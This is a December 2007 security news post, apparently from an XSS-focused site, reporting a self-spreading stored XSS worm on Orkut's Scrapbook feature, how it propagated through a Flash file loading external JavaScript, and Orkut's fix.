XSS worm hits Orkut

Written by KF

Thursday, 20 December 2007

Update: We noticed that an older vulnerability is still working, if the worm was malicious it could have combined the two vulnerabilities, fortunately it wasn't. check: . Orkut published an article on their blog about the attack:

Yesterday, a XSS worm hit Orkut - the famous social networking website, owned by Google.
According to some reports, it seems that the permanent XSS (Script Insertion) was found in the HTML messages feature of the "Scrapbook" page, which allows members to leave messages on someone else's profile. Fortunately the author of the discovery, a brazilian man called Rodrigo Lacerda,  used the xss to propagate a "harmless" worm, which was sending other "scraps" to all the scrapbooks of contacts and joining them in the community called "Infectados pelo Vírus do Orkut", which had a peak of over 650,000 members! The scraps were containing a flash file which was calling a JavaScript code on a third party site, used to infect anybody who would view the scrap. The following message was also left on the scrapbook:

"Feliz natal para vc!
Tenha uma otima semana =)
2008 vem ai... que ele comece mto bem para vc
Boas festas de final de ano"
Orkut fixed the vulnerability earlier today. This incident proves another time how important web application security is, and how dangerous XSS vulnerabilities can be, and we are sure that this is only one of the first incidents that will appear in a long list in the following years.

Home | News | Articles | Advisories | Submit | Alerts | Links | What is XSS | About | Contact | Some Rights Reserved.